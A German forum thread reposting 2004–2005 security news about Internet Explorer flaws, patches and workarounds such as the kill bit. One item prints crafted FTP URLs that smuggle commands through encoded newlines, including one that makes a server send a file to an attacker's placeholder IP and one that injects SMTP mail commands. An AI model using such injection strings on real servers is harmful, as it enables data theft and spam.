PC-Ecke => # Security Center => Thema gestartet von: Jürgen am 17 Dezember, 2004, 01:00
Titel: Schwachstellen im Microsoft Internet Explorer
Beitrag von: Jürgen am 17 Dezember, 2004, 01:00
Die Sicherheitsspezialisten von Greyhat haben ein Advisory veröffentlicht, das auf eine Schwachstelle im Internet Explorer hinweist. Durch einen Fehler im ActiveX-Control DHTML Edit (dhtmled.ocx) lässt sich beliebiger HTML- und JavaScript-Code in eine dargestellte Web-Seite einschleusen. Das Control ist als "Safe for Scripting" markiert, sodass es sich via JavaScript fernsteuern lässt. Insbesondere ist es möglich via execScript() Skript-Code in andere Seiten einzuschleusen.
In einer Demo auf den Seiten von Greyhat lädt das Control die Startseite von Google und schleust JavaScript ein, um das Google-Cookie anzuzeigen. Prinzipiell hätte das Cookie auch an einen Angreifer übermittelt werden können. Ferner ist es möglich, den kompletten Inhalt einer Web-Seite zu überschreiben, ohne dass die angezeigte Adresse sich ändert.
Betrüger können Anwendern mit speziell präparierten Seiten quasi beliebig gefälschte gefälschte Web-Seiten unterschieben. Ein ähnliches Problem (Phishing mit Fenstern ) meldete heise Security vergangene Woche; dort waren aber auch andere Browser betroffen. Der nun entdeckte Fehler wurde für den Internet Explorer unter XP mit SP1 und SP2 bestätigt. Abhilfe schafft das Deaktivieren von ActiveX in der Internet Zone.
Das DHTML-Edit-Control war in der Vergangenheit schon mehrfach für Sicherheitslücken im Internet Explorer verantwortlich. Auch die zuletzt von http-equiv veröffentlichte Demo zum Austricksen des Pop-up-Blockers unter XP mit Service Pack 2 nutzt eine Schwachstelle darin aus.
Siehe dazu auch:
* Security Advisory von Greyhat
(dab/c't) Quelle mit Links: http://www.heise.de/newsticker/meldung/54352
Titel: Schwachstelle in FTP-Client des Internet Explorers
Beitrag von: SiLæncer am 04 Januar, 2005, 11:20
Nach Angaben des italienischen Sicherheitsspezialisten Albert Galicia können präparierte FTP-Server eine Schwachstelle im Internet Explorer ausnutzen, um Dateien in beliebige Verzeichnisse auf dem lokalen Rechner eines Anwenders zu schreiben. Ursache ist ein Fehler des in Microsofts Browser implementierten FTP-Clients, der vom Server übermittelte Pfadinformationen nicht vollständig filtert. Durch zusätzliche Angabe von "../" lässt sich so der Pfad zum Speicherort manipulieren. Laut Advisory soll dies aber nur funktionieren, wenn der Anwender die Datei über Drag&Drop oder per Rechtsklick und "Speichern als" auf seinen Rechner kopiert -- beim Doppelklick tritt das Problem nicht auf.
Unter Umständen können Angreifer durch den Fehler Systemdateien überschreiben oder Schadcode in das lokale System einschleusen. Allerdings ist immer eine Interaktion des Anwenders notwendig, da nur er einen Download anstoßen kann. Betroffen ist der Internet Explorer unter Windows 2000 mit SP4 und Windows XP mit Service Pack 1. Der Fehler ist in XP Service Pack 2 nicht mehr enthalten.
Quelle : www.heise.de
Titel: Weitere Fehler in FTP-Komponenten von Web-Browsern
Beitrag von: SiLæncer am 05 Januar, 2005, 13:09
In den FTP-Komponenten der Web-Browser Konqueror und Internet Explorer sind Schwachstellen enthalten, mit denen sich über präparierte FTP-URLs (FTP://) Befehle auf einem FTP-Server ausführen lassen. Darüber hinaus ist es mit derartigen Links sogar möglich, Mails an SMTP-Server zu übergeben. Spammer könnten Web-Seiten so manipulieren, dass Besucher etwa beim Klick auf ein Bild eine Mail versenden.
Das Problem liegt in der fehlenden Filterung URL-kodierter Newline-Zeichen (%0a), sodass sich etwa FTP-Befehle in aufgebaute FTP-Sessions einschleusen lassen:
ftp://ftpuser:ftppass@server/directory%0aftp-befehl%0a Im vorliegenden Beispiel ist noch eine Authentifizierung durch den Nutzer erforderlich. Laut Albert Galicia, Entdecker der Schwachstelle, lässt sich anschließend aber der Server mit beliebigen Kommandos steuern, sofern der Anwender auf einen Link klickt.
ftp://server/%0aPORT%20a,b,c,d,e,f%0aRETR%20/file den FTP-Server, eine auf ihm gespeicherte Datei an den Angreifer mit der IP-Adresse a,b,c,d zu senden. Zudem wäre das Löschen von Dateien möglich.
Da die FTP-Kommunikation eine gewisse Ähnlichkeit mit SMTP aufweist, funktioniert das Versenden von Mails mit bestimmten Links ebenfalls.
ftp://foo%0d%0aHELO mail%0d%0aMAIL FROM%3a<>%0d%0aRCPT TO%3a%0d%0aDATA%0d%0aSubject%3a hacked%0d%0aTo%3a user%40server%0d%0a%0d%0ahacked %0d%0a.%0d%0a:victim@domain:25 Die Fehler sind seit dem 5. Dezember (Konqueror) beziehungsweise dem 7. Dezember (Internet Explorer) bekannt. Das KDE-Team hat ein Advisory veröffentlicht, das auf Patches für die vom Konqueror verwendete FTP-Komponente FTP kioslave unter KDE 3.2.3 und 3.3.2 hinweist. Die Linux-Distributoren haben bereits aktualisierte KDE-Pakete herausgegeben.
Für den Internet Explorer ist noch kein Update verfügbar, in Windows XP mit Service Pack 2 ist der Fehler aber nicht mehr enthalten. XP-Anwender mit Service Pack 1 sollten alsbald Service Pack 2 installieren, da dort bereits ein große Zahl nun aufgedeckter Fehler beseitigt ist. Allerdings öffnet man damit Sicherheitslücken, die unter SP1 nicht vorhanden sind. Anwender von Windows 2000 und XP-Anwender die aus bestimmten Gründen SP2 nicht installieren können, sollten einen alternativen Browser in Betracht ziehen.
Quelle : www.heise.de
Titel: Microsoft über kritische Lücken im Internet Explorer und Outlook informiert
Beitrag von: SiLæncer am 01 April, 2005, 13:08
Der Sicherheitsdienstleister eEye hat nach eigenen Angaben Microsoft über zwei kritische Lücken im Internet Explorer und Outlook informiert. Der Ankündigung über kommende Sicherheitshinweise zufolge kann ein Angreifer damit ein Windows-System mit Schadcode infizieren oder unter seine Kontrolle bringen. Nähere Angaben dazu macht eEye nicht; es soll aber nur eine minimale Benutzerinteraktion notwendig sein. Details will der Dienstleister erst nach der Verfügbarkeit von Updates veröffentlichen. Betroffen sind die Standardinstallationen des Internet Explorer und von Outlook unter allen Versionen von Windows NT 4.0, 2000 und XP. Ob Windows Server 2003 verwundbar ist, wird derzeit noch geprüft.
US-Medienberichten zufolge untersucht Microsoft derzeit die Schwachstellen mit höchster Priorität, könne aber noch nicht sagen, wann Updates zur Verfügung stünden. Bislang habe man auch noch keine Meldungen erhalten, dass die Schwachstellen bereits ausgenutzt würden. Marc Maiffret von eEye hält allerdings das Risiko für Zero-Day-Exploits, also Angriffe auf Lücken, für die es noch keinen Patch gibt, für relativ hoch. In der Vergangenheit habe sich Microsoft beim Stopfen kritischer Löcher oftmals zu viel Zeit gelassen und die Kunden unnötigen Risiken ausgesetzt -- das müsse sich zukünftig verbessern.
Quelle und Links : http://www.heise.de/newsticker/meldung/58143
Titel: Exploit für Lücke im Internet Explorer in Umlauf
Beitrag von: SiLæncer am 14 April, 2005, 06:48
Für die DHTML-Schwachstelle im Internet Explorer ist bereits der erste Exploit erschienen, der auf einem verwundbaren System eine Backdoor auf dem TCP-Port 28876 öffnet. Bereits beim Besuch einer Web-Seite -- ohne weitere Interaktion des Anwenders -- jubelt der Server dem Browser Schadcode unter, um die Hintertür zu installieren. Verbindet sich ein Angreifer etwa per Telnet auf den Port hat er darüber Zugriff auf eine Windows-Eingabeaufforderung. Ist das Opfer als Administrator auf dem System angemeldet gewesen, hat auch der Eindringling diese Rechte und kann fortan das System kontrollieren.
Bei einem Test der heise-Security-Redaktion auf einem Windows-XP-Rechner mit SP2 warnte beim Öffnen der Hintertür aber die eingebaute XP-Firewall. Die Meldung wies darauf hin, dass der Internet Explorer einen Port öffnen möchte. Ein argloser Anwender könnte dem zustimmen. Mit einem besser programmierten Exploit ließe sich diese Warnmeldung allerdings komplett umgehen. Zudem fand der Virenscanner im Browsercache Fragmente des im Exploit enthaltenen Shell-Codes und schlug ebenfalls Alarm. Anwender, auf deren Rechner keinerlei Schutzsoftware läuft, können nur noch durch einen Blick in die Liste der geöffneten Ports (netstat -a) feststellen, ob eine Backdoor aktiv ist. Der Backdoor-Prozess selbst ist in der Prozessliste als iexplorer.exe eingetragen.
Betroffen sind Windows XP mit SP1 und SP2, sowie Windows 2000 mit SP4. Abhilfe schafft die Installation des von Microsoft zur Verfügung gestellten Sicherheitsupdates oder das Abschalten von JavaScript und Popups.
Quelle und Links : http://www.heise.de/newsticker/meldung/58544
Titel: Weitere Sicherheitslöcher im Internet Explorer
Beitrag von: SiLæncer am 17 Mai, 2005, 18:42
Die Sicherheitsfirma Eeye kündigt die Veröffentlichung einer Sicherheitsempfehlung an, die Details über eine schwerwiegende Schwachstelle im Internet Explorer enthalten soll. Auch Outlook soll davon betroffen sein. Standardinstallationen der Software unter Windows NT, 2000 und XP sollen ohne großes Zutun des Benutzers das Einschleusen und Ausführen von Programm-Code ermöglichen.
Microsoft wurde am 5. Mai über die entdeckte Sicherheitslücke informiert und hat sie bestätigt. Die Öffentlichkeit soll hingegen erst über die Details in Kenntnis gesetzt werden, wenn Microsoft ein Update oder eine Empfehlung veröffentlicht. Dieses Vorgehen entspricht der üblichen Politik von Eeye und anderen Sicherheitsfirmen. Damit soll vermieden werden, dass die Sicherheitslöcher ausgenutzt werden können, bevor Benutzer die Chance haben sie zu stopfen.
Zwei weitere bislang unveröffentlichte Schwachstellen wurden von Eeye bereits im März an Microsoft gemeldet. Obwohl in der Zwischenzeit zwei "Patch Days" (zweiter Dienstag im Monat) verstrichen sind, gibt es von Microsoft noch keine Updates oder Empfehlungen dazu. Beide Sicherheitslücken sollen ähnlich schwerwiegend sein wie die oben genannte.
Microsoft hat seit der Einführung der regelmäßigen Update-Tage bereits dreimal außer der Reihe wichtige Sicherheits-Updates für den Internet Explorer veröffentlicht. Erst kürzlich kündigte Microsoft an, man werde die monatlich erscheinenden "Security Bulletins" durch unregelmäßig veröffentlichte "Advisories" ergänzen . Die oben genannten Sicherheitslücken wären eine gute Gelegenheit, damit anzufangen.
Quelle : www.pcwelt.de
Titel: Schwachstellen im Microsoft Internet Explorer
Beitrag von: SiLæncer am 30 Mai, 2005, 16:00
Der Sicherheitsdienstleister Security Focus und das französische Sicherheitsportal FRSIRT (früher K-Otic) berichten über mehrere Schwachstellen im Internet Explorer. Sie können mit speziell präparierten Web-Seiten genutzt werden, um den Internet Explorer zum Absturz zu bringen.
Die erste Schwachstelle besteht bei Web-Seiten mit einem speziell konstruierten "OBJECT"-Tag, bei dem sich zwei Seiten gegenseitig einbetten. Der Internet Explorer gerät dadurch in eine Endlos-Schleife und stürzt letztlich ab.
Die zweite Sicherheitslücke befindet sich in der Datei "jscript.dll". Bei Javascript-Events des Typs "onLoad" in entsprechend vorbereiteten HTML-Seiten stürzt der Internet Explorer ab. Dazu kann es genügen, eine ungültige Funktion aufzurufen.
Der dritte Schwachpunkt, der zu einem Absturz führen kann, ist in der Datei "urlmon.dll" enthalten. Hier führt das Hinzufügen einer präparierten Web-Adresse (URL) zur Sicherheitszone "eingeschränkte Sites" zum Absturz.
Betroffen ist in allen Fällen der Internet Explorer 6.0 mit Service Pack 2 (IE 6 SP2) sowie zum Teil auch ältere Versionen. Nach Angaben von Security Focus wurde die zweite der genannten Schwachstellen in früheren Versionen bereits behoben und taucht im IE 6 SP2 wieder auf. Das gleiche sagt FRSIRT über die dritte Schwachstelle.
Mozilla-Browser (Mozilla 1.7.8, Firefox 1.0.4, K-Meleon 0.8.2) und Opera 8.0 lassen sich von alledem nicht beeindrucken.
Quelle : www.pcwelt.de
Titel: Fehler im Internet Explorer mit ungewissen Folgen
Beitrag von: SiLæncer am 30 Juni, 2005, 13:23
In einem Advisory warnt die östereichische Firma SEC Consult vor einem Fehler im Internet Explorer, der zumindest dessen Absturz, eventuell aber auch die Ausführung externen Codes zur Folge haben könnte.
Der Internet Explorer bietet die Möglichkeit, COM-Objekte analog zu ActiveX-Controls über das <object>-Tag einzubinden. SEC Consult hat bei Tests festgestellt, dass auf einem normalen Windows-XP-System wenigstens zwanzig COM-Objekte herumliegen, deren Aufruf unter bestimmten Bedingungen zum Absturz des Microsoft-Browsers führen kann. Dazu gehört javaprxy.dll, bei dem eine speziell präparierte Webseite einen Heap-Overflow herbeiführen kann. Da man dabei Einfluss auf den Inhalt des Registers eax nehmen kann, vermuten die Österreicher, man könnte eventuell einen Function Pointer überschreiben und damit eigenen Code ausführen.
Die Sicherheitsberater demonstrieren das Problem mit einem CGI-Script, das javaprxy.dll über dessen ClassID in einem Objekt-Tag mit 30.000 A-Zeichen aufruft. In Tests von heise Security stürzte dabei tatsächlich der Internet Explorer auf einem System mit Windows XP Service Pack 2 und allen aktuellen Patches ab. Wie Bernhard Müller von SEC Consult gegenüber heise Security erläuterte, kann Microsoft die Abstürze zwar nachvollziehen, sieht aber keine Gefahr, dass fremder Code zur Ausführung kommen könnte. Deshalb wolle Microsoft zwar demnächst die Behandlung von COM-Objekten robuster gestalten, aber kein Sicherheits-Update herausgeben.
Quelle und Links : http://www.heise.de/newsticker/meldung/61245
Titel: Microsoft patcht Java-Loch des Internet Explorer
Beitrag von: SiLæncer am 06 Juli, 2005, 13:33
Gegen die vergangene Woche gemeldete Schwachstelle im Internet Explorer stellt Microsoft nun ein Update bereit. Durch einen Fehler im COM-Objekt Javaprxy.dll ist es einer präparierten Webseite möglich, volle Kontrolle über ein System zu erlangen -- zumindest wenn der Anwender als Administrator angemeldet ist. Es genügt dazu, dass der Anwender die Webseite aufruft.
Das COM-Objekt gehört zu Microsofts Java-Implementierung, die die Redmonder ohnehin nicht mehr unterstützen. So setzen sie mit diesem Patch kurzerhand das Kill Bit in der Registry, das dafür sorgt, dass es aus dem Internet Explorer heraus nicht mehr aufgerufen oder nachinstalliert werden kann. Das führt jedoch dazu, dass die Microsoft Java Virtual Machine unter Umständen nicht mehr funktioniert. Der Patch ist als Workaround aufgeführt, was darauf schließen lässt, dass Microsoft zu einem späteren Zeitpunkt einen Patch nachreichen will, der das Problem konsequenter angeht.
Bisher geht Microsoft mit diesem Sicherheitsloch noch sehr halbherzig um. Das Advisory ist auf keiner der zentralen Sicherheitsseiten verlinkt, das Update wird zumindest bisher nicht über den automatischen Update-Service angeboten und auch der neue Microsoft Baseline Security Analyzer 2.0 attestiert verwundbaren Rechnern, dass alles im grünen Bereich wäre. Angesichts der Tatsache, dass bereits funktionierende Exploits im Internet verfügbar sind, die sich recht einfach erweitern lassen, könnte sich diese Halbherzigkeit noch bitter rächen, wenn es beispielsweise einem Angreifer gelingen sollte, auf einer vielbesuchten Web-Seite Code zu platzieren, der einen Trojaner installiert.
Alle Benutzer des Internet Explorer sollten das Update deshalb baldmöglichst installieren. Ausgenommen sind lediglich neuere Systeme, auf denen Microsofts Java ohnehin nicht mehr installiert ist. Wer auf Microsofts Java angewiesen ist, sollte nur noch mit hohen Sicherheitseinstellungen im Internet surfen. Weitere Details zu den möglichen Workarounds liefert das bisher nur in Englisch verfügbare Advisory.
Quelle und Links : http://www.heise.de/newsticker/meldung/61445
Nutzer des Internet Explorer, die den letzten IE-Patch von Microsoft nicht eingespielt haben, surfen gefährlich. Mittlerweile tauchen immer mehr Web-Seiten auf, die den Fehler in Microsofts Java-Implementierung ausnutzen, um Spyware oder Trojaner zu installieren. Dazu modifizieren die Kriminellen den öffentlich verfügbaren Exploit, indem sie eigenen Shell-Code einbauen, der beispielsweise ein Programm aus dem Netz nachlädt und ausführt. Einige Virenscanner erkennen manche Exploits bereits -- aber längst nicht alle. "Insgesamt ist die Erkennungsrate noch recht dürftig.", warnt Andreas Marx von AV-Test gegenüber heise Security.
Die Infektion des Rechners erfolgt ohne Zutun des Anwenders. Dieser muss dazu lediglich eine Web-Seite öffnen, die den Schadcode enthält. Aufpassen beim Surfen -- also das bewusste Vermeiden dubioser Seiten -- bietet keinen nennenswerten Schutz. Angreifer haben es bereits in der Vergangenheit immer wieder geschafft, in Server einzubrechen und ihren Unrat dort einzuschleusen. Besonders im Visier haben sie dabei derzeit Server, die nicht ausreichend aktualisierte PHP-Software einsetzen und damit leicht zu kapern sind. Aber auch gut gewartete Web-Sites können indirekt zur Viren-Schleuder werden. So gelang es beispielsweise letztes Jahr Kriminellen, einen Ad-Server der Falk-AG zu hacken. Die Folge war, dass unter anderem populäre Sites wie The Register Seiten mit "vergifteten Anzeigen" auslieferten und damit Systeme ihrer Besucher infizierten.
Wer es noch nicht getan hat, sollte deshalb schleunigst den Patch in MS-05-037 installieren. Vor allem Endanwender sollten dazu wenn möglich die automatische Update-Funktion von Windows so einstellen, dass neue Patches automatisch im Hintergrund heruntergeladen und installiert werden. Dies beeinträchtigt den normalen Internet-Zugang nicht wesentlich, da der Update-Mechanismus im Hintergrund mit niedriger Priorität läuft. Und die immer wieder auftauchenden Verdächtigungen, Microsoft spioniere im Zuge solcher automatisierter Updates Anwender aus, ließen sich bisher in keinem einzigen Fall erhärten.
In Firmen sorgen SUS- beziehungsweise WSUS-Server (Windows Server Update Services) dafür, dass nicht jeder Anwender die Patches einzeln herunterladen muss. Des Weiteren ermöglicht es der eigene Update-Server den Administratoren, die Updates vor der Freigabe zur Installation auf Produktionssystemen zunächst selbst auf Testsystemen auf mögliche Unverträglichkeiten mit eingesetzter Soft- oder Hardware zu testen. Der Patch in MS-05-037 setzt das Kill Bit auf eine Komponente von Microsofts Java-Implementierung und verhindert damit, dass diese aus dem Internet Explorer heraus aufgerufen wird. Wer also beispielsweise Web-Applikationen einsetzt, die Microsofts Java VM nutzen, sollte diese unbedingt vorher auf mögliche Probleme testen.
Quele und Links : http://www.heise.de/newsticker/meldung/61700
Titel: Internet Explorer verschluckt sich an kaputten Bildern
Beitrag von: Warpi am 19 Juli, 2005, 05:58
Mit einer improvisierten Test-Suite hat Michal Zalewski mehrere Probleme in der Behandlung von kaputten Bildern durch den Internet Explorer aufgespürt. Mehrere seiner Testkandidaten bringen den Microsoft-Browser zum Absturz, bei mindestens einem vermutet er, dass sich darüber auch Code ausführen lassen könnte.
Auf Grund von schlechten Erfahrungen mit Microsofts Security-Team habe er sich nicht die Mühe gemacht, die Firma vorab zu benachrichtigen, sondern veröffentlicht den Sachverhalt und das Skript zur Erstellung der Bilder direkt. Insbesondere habe er keine Lust gehabt, die Zeit zu investieren, einen echten Exploit zu entwickeln. Das sei aber nach seiner Erfahrung notwendig, um Microsoft von der Ernsthaftigkeit eines Problems zu überzeugen.
So steht eine detaillierte Analyse der Probleme noch aus. Insbesondere betont Zalewski, dass er bislang nicht sonderlich intensiv gesucht habe. Deshalb würden weitere Tests mit dieser Suite höchstwahrscheinlich weitere Probleme zu Tage fördern. Bei Tests von heise Security führten auf einem System mit IE 6, Windows XP SP2 und allen aktuellen Patches drei der von Zalewski bereitgestellten Bilder zu einem sofortigen Crash des Browsers, während ein aktueller Firefox die Ausgabe jeweils mit einer Meldung verweigerte, dass das Bild Fehler enthalte.
Zalewski ist eine Art Enfant Terrible der Security-Szene, der mit unkonventionellen Methoden immer wieder Probleme aufdeckt und sich dabei nicht scheut, überall anzuecken. So hatte er sich im vergangenen Jahr den Zorn von Open-Source-Fanatikern zugezogen, als er mit einem ähnlichen Verfahren kaputte HTML-Seiten erstellt und dabei mehrere Fehler in Mozilla&Co aufgespürt hatte, während der Internet Explorer sich zunächst relativ unbeeindruckt zeigte. Wenig später wurde jedoch mit einer Variation seines mangleme-Skripts, das die Seiten mit den ungültigen Tags erstellte, der Pufferüberlauf bei der IFrame-Behandlung des Internet Explorer entdeckt, der dann als BOFRA Berühmtheit erlangte und Microsoft ziemlich ins Schwitzen brachte.
Quelle : www.heise.de
Titel: Weiteres schweres Sicherheitsloch im Internet Explorer
Beitrag von: SiLæncer am 03 August, 2005, 10:00
Noch kein Patch verfügbar
Die Sicherheitsexperten von eEye haben eine weitere schwere Sicherheitslücke im Internet Explorer gefunden. Das Sicherheitsloch in Microsofts Browser erlaubt Angreifern die Ausführung beliebigen Programmcodes, so dass diese eine umfassende Kontrolle über ein fremdes System erlangen können.
In einem Vorab-Advisory berichtet eEye, dass die neu entdeckte Sicherheitslücke im Internet Explorer die Windows-Versionen 2000, XP sowie Windows Server 2003 betrifft. Nutzer von Windows XP mit Service Pack 2 scheinen von dem Problem nicht betroffen zu sein. Ansonsten wird das Sicherheitsrisiko von eEye als hoch eingestuft.
Noch fehlen weitere Details zu dem Sicherheitsloch, wozu auch Angaben dazu gehören, unter welchen Umständen das Sicherheitsleck zum Problem wird. Womöglich wird eEye erst dann weitere Details nennen, sobald ein Patch zur Abhilfe bereit steht. Dies könnte am nächsten planmäßigen Patch-Day von Microsoft am 9. August 2005 der Fall sein.
Quelle : www.golem.de
Titel: Microsoft zieht Update für Internet Explorer zurück
Beitrag von: SiLæncer am 10 August, 2005, 13:07
Microsoft hat den im Download Center angebotenen Patch MS05-038 zum Schließen mehrerer kritischen Lücken im Internet Explorer wieder zurückgezogen. Ein Klick auf den Download-Link produziert derzeit nur eine Fehlermeldung. Nach Angaben des Softwarekonzerns war die Datei fehlerhaft, sodass sich Windows aufgrund der ungültigen digitalen Signatur weigerte, den Patch zu installieren. Sobald die Entwickler das Update repariert haben, will man es im Download Center wieder zur Verfügung stellen.
Anwender, die zum Aktualisieren ihres Systems das automatische System-Update oder die Website Windows Update verwenden, hatten indes keine Probleme mit dem Patch. Deren Systeme sollten die gemeldeten Fehler bereits nicht mehr enthalten.
Zusätzlich zu den sechs angekündigten Patches können Anwender beim Update noch einen weiteren Softwareflicken angeboten bekommen. Der soll ein Problem nach der Installation des Sicherheitsupdate MS05-012 beheben. Unter Umständen erscheint in der Folge nämlich die Fehlermeldung "Generic Host Process".
Auf der französischen Sicherheitsseite FrSIRT sind derweil die ersten Exploits zum Ausnutzen von zwei der gemeldeten Lücken erschienen. Einer widmet sich der COM-Lücke im Internet Explorer und öffnet eine Hintertür auf Port 28876. Der andere bringt den Rechner über die RDP-Lücke zum Absturz oder Neustart.
Quelle und Links : http://www.heise.de/newsticker/meldung/62664
Titel: Internet Explorer: Probleme mit Sicherheits-Patch behoben
Beitrag von: SiLæncer am 11 August, 2005, 19:56
Funktionierender Patch für Internet Explorer wieder per Download-Center zu haben
Am gestrigen 10. August 2005 hatte Microsoft anlässlich des monatlichen Patch-Days einen Sammel-Patch für den Internet Explorer veröffentlicht, um drei Sicherheitslücken in dem Browser zu schließen. Wurde der Patch über Microsofts Download-Center geladen, ließ er sich auf Grund eines Fehlers, der nun behoben ist, jedoch nicht installieren.
Bereits kurze Zeit nach der Veröffentlichung des Sammel-Patches für den Internet Explorer hatte Microsoft erfahren, dass sich der Patch nicht installieren ließ, wenn er via Download-Center geladen wurde. Dennoch hat es mehr als einen Tag gedauert, bis Microsoft das Problem abstellen konnte. Die ebenfalls am Patch-Day erschienenen Sicherheits-Patches für Windows waren von dem Problem nicht betroffen.
Da sich die Komplikationen nur auf Microsofts Download-Center beschränkten, konnte der Internet-Explorer-Patch auch gestern schon ohne Schwierigkeiten installiert werden, sofern man die Update-Funktion von Windows bemühte. Durch die Bereinigung des Fehlers kann der funktionierende Sammel-Patch für den Internet Explorer nun auch wieder über das betreffende Security Bulletin bezogen werden. Für alle Sicherheits-Patches gilt generell, dass Microsoft die kürzlich für Downloads gestartete Überprüfung einer Windows-Lizenz nicht vornimmt.
Zumindest für Windows XP mit Service Pack 2 bietet die Webseite Winhelpline.de bereits Setup-Routinen an, womit sich die einzeln geladenen Patches in einem Rutsch installieren lassen. In Kürze werden auch inoffizielle Patch-Pakete bzw. weitere Setup-Routinen erwartet, um die Sicherheitslücken von Windows und dem Internet Explorer mit einem Rutsch schließen zu können.
Quelle und Links : http://www.golem.de/0508/39797.html
Titel: Kritische Lücke im Internet Explorer -- Tragweite unbekannt
Beitrag von: Warpi am 18 August, 2005, 15:28
Eine neue kritische Lücke in Microsofts Internet Explorer gefährdet die Systeme von Windows-Anwendern -- und keiner weiß genau, wer betroffen ist. Das französische Sicherheitsportal FrSIRT hat einen Zero-Day-Exploit veröffentlicht, bei dem bereits der Aufruf einer präparierten Webseite ein System mit Schadcode infizieren soll. Ursache der Lücke ist laut Microsoft und FrSIRT ein Fehler im COM-Objekt msdds.dll (Microsoft Design Tools Diagram Surface).
Auf Standardsystemen ist diese Datei aber normalerweise eigentlich nicht vorhanden: Laut Microsoft ist sie Bestandteil von Visual Studio. FrSIRT weist aber im Advisory darauf hin, dass auf dem Testsystem der Sicherheitsexperten kein Visual Studio installiert war.
Wie die verwundbare Datei auf den Rechner gelangt ist, bleibt vorerst offen. Eventuell ist msdds.dll auch Bestandteil bestimmter Installationen weiterer Software aus Redmond, etwa bei Designer und Office-Programmen. Microsoft untersucht das Problem zur Zeit genauer und will gegebenenfalls ein Security Update veröffentlichen.
Der Exploit soll auf einem infizierten PC eine Backdoor auf Port 28876 öffnen. Bei einem ersten Test der heise-Security-Redaktion auf einem Windows-XP-SP2 mit allen Patches und ohne Visual Studio funktionierte der Angriff jedoch nicht. Weitere Tests laufen noch -- sobald zusätzliche Ergebnisse und Informationen vorliegen, wird eine Meldung dazu erfolgen.
Bis dahin sollten Anwender vorsichtig sein, welche Seiten sie ansurfen. Zwar sollen noch keine Seiten Schadcode über die neue Lücke verbreiten, dies ändert sich in der Regel aber schnell. Auch für die vergangene Woche veröffentlichten COM-Lücken im Internet Explorer gibt es bereits Exploit und auch Server, die dem Anwender darüber Trojaner unterjubeln. Dagegen hilft allerdings das Einspielen der verfügbaren Patches. (oder Linux als Os ;) )
Quelle : www.heise.de
Titel: Sicherheitsspezialisten können neue Lücke im IE nicht reproduzieren
Beitrag von: SiLæncer am 18 August, 2005, 16:51
Nach der Meldung des FrSIRT über die kritische Sicherheitslücke im Internet Explorer haben weltweit Sicherheitspezialisten versucht, das Problem zu reproduzieren. Bislang ist es aber niemandem gelungen, mit dem veröffentlichten Exploit-Code eine Backdoor auf Port 28876 unter Windows XP zu öffnen. Bei mehreren Tests der heise-Security-Redaktion auf XP SP2 mit der verdächtigen Datei msdds.dll -- in der Regel Bestandteil von Office 2003 und Visual Studio -- stürzte der Internet Explorer nur ab oder der Add-on-Manager meldete ein Problem. In einigen Fällen tat sich gar nichts. Ob der Angriff nur bei bestimmten Versionen der DLL oder nur auf französichen XP-Systemen funktioniert, wird auf mehreren Sicherheits-Mailing-Listen noch diskutiert.
Dabei hat sich auch Jan-Berend Wever, Spezialist für Sicherheitslücken in Microsofts Webbrowser, zu Wort gemeldet und weitere Details veröffentlicht. Demnach ist der Internet Explorer zwar in der Lage, COM-Objekte analog zu ActiveX-Controls über das <object>-Tag einzubinden. Allerdings sind zahlreiche dieser Objekte eigentlich nicht für das Laden in den Internet Explorer vorgesehen. Deshalb treten unter Umständen beim Aufruf Fehler auf, die sich zum Einschleusen und Ausführen von Code missbrauchen lassen.
Dass dies ein Problem darstellt, hat Microsoft bereits Anfang Juli mit dem Objekt javaprxy.dll erfahren müssen. Um die Lücke zu stopfen, veröffentlichte der Softwarekonzern außer der Reihe einen Patch, der das Nachladen des Objektes mittels gesetztem Kill Bit verhindert. Am vergangenen Patch Day legte Microsoft noch nach und setzte per Update MS05-038 das Bit für weitere 40 COM-Objekte, mit denen Remote-Code-Execution möglich war. Offenbar hat man dabei msdds.dll aber nicht berücksichtigt.
Auch Wever hat das neue Problem nicht nachvollziehen können und kritisiert FrSIRT scharf. Diese hätten seine Proof-of-Concept-Exploits für die COM-Lücken schamlos kopiert und verbreitet -- ohne ihn wenigstens in den Credits zu erwähnen.
Wer sicherstellen will, dass der Internet Explorer auch auf seinem System das genannte Objekt nicht laden kann, muss das Kill Bit manuell setzen. Dazu ist unter HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\ der Schlüssel {EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F} mit dem Eintrag "Compatibility Flags"=dword:00000400 zu erzeugen.
Update FrSIRT hat sein Advisory zwischenzeitlich aktualisiert. Demnach ist nur die DLL-Version 7.0.9064.9112 verwundbar, wie sie in Office 2002 und Visual Studio 2002 zu finden ist.
Quelle und Links : http://www.heise.de/newsticker/meldung/62954
Titel: Microsoft untersucht neue kritische Lücke im Internet Explorer
Beitrag von: SiLæncer am 30 August, 2005, 13:12
Laut US-Medienberichten prüft Microsoft derzeit Hinweise auf eine neue kritische Lücke im Internet Explorer. Über die Lücke soll ein Angreifer einem vollständig gepatchten Windows-XP-SP2-PC Schadcode unterschieben können. Dazu soll der Besuch einer präparierten Webseite bereits ausreichen. Der Entdecker der Lücke, der Sicherheitsspezialist Tom Ferris, hat das Problem bereits am 14. August an die Redmonder gemeldet und ihnen eine Demo zur Verfügung gestellt, um den Fehler nachvollziehen zu können.
Einzelheiten will Ferris erst dann veröffentlichen, wenn Microsoft einen Patch herausgibt. Auf seiner Webseite ist bislang nur ein Screenshot zu finden, der einen Absturz des Internet Explorer nebst Fehlermeldung zeigt. Ferris' Analyse zufolge soll sich der Fehler zum Einschleusen von Code ausnutzen lassen, den Beweis hat er allerdings noch nicht erbracht. Es gibt keine Hinweise darauf, dass der Fehler bereits von Crackern ausgenutzt wird.
Quelle und Links : http://www.heise.de/newsticker/meldung/63361
Titel: Lücke macht den Internet Explorer zum Proxy
Beitrag von: SiLæncer am 29 September, 2005, 13:20
Durch einen Fehler im ActiveX-Control Microsoft.XMLHTTP könnte eine böswillige Website beliebige HTTP-Anfragen "einschleusen", Daten wie den Referrer manipulieren oder sogar eine Man-in-the-Middle-Attacke ausführen. Diese Angriffe sind auch bei einem vollständig gepatchten Windows XP mit Service Pack 2 möglich. Eine ähnliche Lücke schlossen die Mozilla-Entwickler mit den vor kurzen aktualisierten Browser-Paketen; Netscape ist wahrscheinlich noch anfällig.
XmlHTTPRequest stellt ein JavaScript-Objekt dar. Es erlaubt JavaScript-Code, nahezu komplett selbst zusammengestellte HTTP-Anfragen zu verschicken und die Antworten auch in "roher" Form zu verarbeiten. Der Fehler liegt darin, dass die Microsoft-Implementierung einige Felder der HTTP-Anfragen nicht überprüft und filtert.
